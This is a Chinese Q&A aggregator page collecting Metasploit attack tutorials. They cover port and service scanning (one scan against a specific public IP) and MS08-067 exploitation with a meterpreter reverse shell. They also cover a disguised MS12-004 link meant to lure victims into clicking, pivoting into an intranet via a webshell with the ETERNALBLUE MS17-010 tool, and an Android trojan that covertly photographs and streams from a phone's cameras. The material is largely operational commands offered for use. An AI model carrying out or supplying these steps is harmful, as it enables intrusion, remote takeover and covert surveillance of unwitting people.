導航:首頁 > 程序命令 > msf埠遷移命令

msf埠遷移命令

發布時間:2025-01-31 13:54:58

⑴ 如何用Metasploit掃描埠

一、調用Nmap進行掃描
進入msf命令行後直接輸入nmap –v –sVip(具體命令和nmap一樣)
二、MSF模塊掃描
Use auxiliary/scanner/postscan/syn
先用搜索命令搜索有關埠掃描的工具:searchportscan
我們使用Use auxiliary/scanner/postscan/syn
看一下參數配置 showoptions

我們先來設置一下網卡
Set INTERFACE eth0
設置一下掃描的埠,我們這里來掃描80:set PORTS 80
設置掃描目標RHOSTS :set RHOSTS 119.63.37.149
在設置一下線程:set THREADS 100
看一下我們設置好的

這時候我們都設置好了,我們來攻擊下,看看效果,用命令run進行攻擊
缺點就是掃描的速度有點慢啊

MetaSploit SMB掃描獲取系統信息
還是搜索一下smb:searchsmb

這次發現搜出來很多,我們用這個模塊
Use auxiliary/scanner/smb/smb_version
看一下需要設置的參數

設定目標ip:set RHOSTS 192.168.188.140
在設置一下線程:set THREAD 10
然後run一下,查看結果

直接掃描出來小夥伴的系統還有主機名,速度不到1s,很快
也可以批量掃描設置批量掃描目標即可 set RHOSTS 192.168.188.50-200

MetaSploit服務識別
我們這里對SSH和FTP進行識別
在這里使用這個模塊:use auxiliary/scanner/ssh/ssh_version
然後我們設置一下參數,這里講設置好的參數截圖看一下

Run一下看看結果,其實沒有掃出來,好像是屏蔽了,但是用nmap卻掃出來了ssh

在試一下ftp,用這個模塊:use auxiliary/scanner/ftp/ftp_version
設置下參數

可以看到結果,也沒有掃描出來;
MetaSploit SNMP掃描與枚舉
搜索一下snmpuse auxiliary/scanner/snmp/snmp_login
看一下他的參數設置

這個參數還是很多的
設定一下目標
然後在run一下
枚舉用這個模塊
use auxiliary/scanner/snmp/snmp_enum

設置好目標和線程後run一下就可以

MetaSploit遠程代碼執行
搜索一下08-067,使用這個攻擊載荷
use exploit/windows/smb/ms08_067_netapi
同樣來看一下參數設置

我們只要設置一下目標就可以,然後我們需要一個載荷來反彈shell
set payload windows/meterpreter/reverse_tcp
然後設置參數

將LHOST 設置為自己的ip(對外攻擊不要忘了段口轉發)
比如說知道對面的系統是什麼版本,可以指定targer,用target查看一下都有什麼版本

設置一下目標,假設我們目標機器的系統為10:set target 10
這時候,我們再來看一下其參數設置,發現比以前完備了好多

08-067是不會自動識別系統版本的,但是其他的可以自動識別,所以用其他攻擊載荷的時候可以不用設置
然後輸入exploit進行攻擊即可
這時候會出來一個meterpreter>
我們在裡面輸入shell,就會反彈一個shell
這樣整個攻擊過程就完成了

MetaSploit MIDI文件解析遠程代碼執行
還是來搜索12-004

設置下本機ip set SRVHOST ip
然後攻擊

會生成一個連接,但是這個鏈接容易讓人發現,所以我們可以偽裝下ip利用URIPATH參數就可以偽裝
在設置時,會發現報紅,因為4444埠被佔用了,所以我們改下監聽埠 set LPORT 5555
然後生成連接

只要目標點了這個鏈接,那麼我們就會上線一個shell
說一下,目標點擊後我們這邊並沒有反映,我們需要輸下session查看當前會話,會找到上線的機子,連接上線的機子
Session –I 1(id)
然後輸入shell就可以拿到shell

⑵ 利用公網Msf+MS17010跨網段攻擊內網

環境搭建

攻擊機為公網環境下的 Ubuntu 搭配 Metasploit(msf),用於生成木馬和監聽埠。

目標主機為內網中的 Win7,IP 地址為 192.168.1.107,已有與之同一內網的 Win2003 Webshell,IP 為 192.168.1.106。

在公網主機執行 msf,生成 msf 木馬並監聽於 1234 埠。

利用已有 Webshell,上傳並執行生成的 shell.exe 文件,成功獲取目標機內網 192.168.1.106 的 shell。

確定當前路由,添加新路由 192.168.1.0/24 到公網主機,通過該路由訪問內網。

掃描目標主機,發現可用 ms17010 漏洞進行攻擊。

嘗試使用 msf 攻擊模塊進行攻擊,但失敗。

在土司論壇求助未找到解決方法,部分人使用原版 fb.py 成功率較高。

最終在 Win2003 機上,通過以下步驟成功攻擊:

在 Win2003 上安裝 Python 和 pywin32。

將 ETERNALBLUE 目錄及其內容復制到 Win2003 機。

在 Win2003 的 windows 目錄下創建名為 listeningposts 的文件。

在 Win2003 上運行 fb.py,執行相關命令以生成並利用 ms17010 漏洞進行攻擊。

在攻擊機上使用 msf 生成 dll 劫持文件並上傳至目標機。

在 Win2003 機上執行相關命令,msf 中成功反彈 shell。

整個過程中,本地使用 msf 自帶攻擊成功,而遠程 msf 攻擊失敗,有待進一步分析原因。

⑶ msf怎麼遠程監控安卓手機

既然是入侵安卓手機,肯定要先配置一個安卓木馬,那我們看看本機的IP

webcam_snap 隱秘拍照功能

後邊跟上參數-i 指定使用那個攝像頭拍照

可以看見我們分別對前後攝像頭都拍了照 保存到了桌面上

還可以輸入命令webcam_stream 開啟攝像頭

閱讀全文

與msf埠遷移命令相關的資料

熱點內容
python代碼精簡 瀏覽:457
文件加密了怎麼找到了 瀏覽:193
jellyfin插件怎麼選擇主伺服器 瀏覽:836
asp用戶注冊源碼 瀏覽:48
什麼是照片壓縮文件 瀏覽:392
java調用js代碼 瀏覽:979
崑山市民app怎麼修改身份信息 瀏覽:779
php登陸次數 瀏覽:744
python字元轉成數字 瀏覽:822
海川用的是什麼伺服器 瀏覽:376
口才是練出來的pdf 瀏覽:458
雲伺服器哪個公司性價比高 瀏覽:517
源碼論壇打包 瀏覽:558
php怎麼做成word 瀏覽:692
python批量生成密鑰 瀏覽:492
程序員要不要考社區人員 瀏覽:150
app的錢怎麼充q幣 瀏覽:814
android銀行卡識別 瀏覽:756
怎麼在app投放廣告 瀏覽:11
手機文件管理怎麼看app名稱 瀏覽:192